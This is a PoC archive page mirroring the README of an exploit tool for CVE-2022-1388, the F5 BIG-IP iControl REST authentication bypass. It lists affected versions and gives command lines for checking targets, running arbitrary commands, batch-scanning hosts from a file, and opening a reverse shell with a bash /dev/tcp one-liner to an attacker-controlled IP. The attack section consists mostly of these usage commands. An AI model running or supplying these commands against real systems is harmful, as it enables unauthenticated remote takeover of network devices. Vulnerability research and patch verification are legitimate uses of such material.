Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
https://github.com/Al1ex/CVE-2022-1388
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
Description
CVE-2022-1388 F5 BIG-IP iControl REST RCE
Readme
## Vuln Impact

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. 

## Vuln Product

- F5 BIG-IQ 11.6.1 - 11.6.5
- F5 BIG-IP 12.1.0 - 12.1.6
- F5 BIG-IP 13.1.0 - 13.1.4
- F5 BIG-IP 14.1.0 - 14.1.4
- F5 BIG-IP 15.1.0 - 15.1.5
- F5 BIG-IP 16.1.0 - 16.1.2

## Vunl Check

**Basic usage**

```
python3 CVE_2022_1388.py
```

![use](img/use.png)

**Vuln check**

```
python3 CVE_2022_1388.py -v true -u https://192.168.17.200
```

![verify](img/verify.png)

**command execute:**

```
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id
```

![command_exec](img/exec.png)

```
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami
```

![exec_2](img/exec_2.png)

**batch scan**

```
python3 CVE_2022_1388.py -s true -f check.txt
```

![batch_scan](img/vul_scan.png)

**Reserve Shell**

```
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"
```

![reverse_shell](img/reverse_shell.png)

![reverse_shell_ok](img/reverse_shell_ok.png)


## Reference

https://support.f5.com/csp/article/K23605346

https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw

https://twitter.com/jas502n/status/1523611433938059265

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388

https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr
File Snapshot

 [4.0K]  /data/pocs/01e4c09e64366a4f53b7d361e9e72e19d0997098
├── [  46]  check.txt
├── [5.4K]  CVE_2022_1388.py
├── [4.0K]  img
│   ├── [ 50K]  exec_2.png
│   ├── [ 53K]  exec.png
│   ├── [112K]  reverse_shell_ok.png
│   ├── [ 51K]  reverse_shell.png
│   ├── [ 29K]  use.png
│   ├── [ 37K]  verify.png
│   └── [ 51K]  vul_scan.png
└── [1.5K]  README.md

1 directory, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →